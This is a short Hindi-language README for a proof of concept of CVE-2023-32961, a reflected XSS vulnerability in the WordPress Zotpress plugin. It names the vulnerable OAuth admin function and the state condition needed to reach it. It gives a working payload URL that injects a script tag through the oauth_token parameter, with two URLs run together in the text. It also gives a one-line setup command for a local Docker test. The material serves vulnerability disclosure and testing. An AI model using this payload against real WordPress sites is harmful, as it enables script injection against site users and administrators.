
CVE-2023-32961 का PoC
यह रिपॉजिटरी Wordpress Zotpress प्लगइन में XSS भेद्यता के बारे में है।
Zotpress
≤ 7.3.3
zotpress
https://wordpress.org/plugins/zotpress/
अप्रमाणित
zotpress/lib/admin/admin.accounts.oauth.php में get_request_token फ़ंक्शन XSS हमले के प्रति संवेदनशील है।
get_request_token फ़ंक्शन को निष्पादित करने के लिए शर्तें पूरी होनी चाहिए। (केवल पहली बार)
इस तरह एक पेलोड भेजें: http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token=1http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token="><script>alert(1)</script>आपको एक zotero.org खाते की आवश्यकता है।
इसे ट्रिगर करने के लिए आपको oauthState मान को 1 पर सेट करना होगा। यदि उपरोक्त पेलोड काम नहीं करता है, तो आपको oauthState को 1 पर सेट करने का कोई तरीका खोजना होगा।
सशर्त अभिव्यक्ति:
$_GET['oauth_token'] != $state['request_token_info']['oauth_token']
php oauth एक्सटेंशन इंस्टॉल करना आसान:
एक-पंक्ति कमांड:
sudo su; apt-get update; apt-get -y install gcc make autoconf libc-dev pkg-config libpcre3-dev; pecl install oauth; bash -c "echo extension=oauth.so > $PHP_INI_DIR/conf.d/oauth.ini"; service apache2 restart
wordpress:latest डॉकर इमेज में परीक्षण किया गया।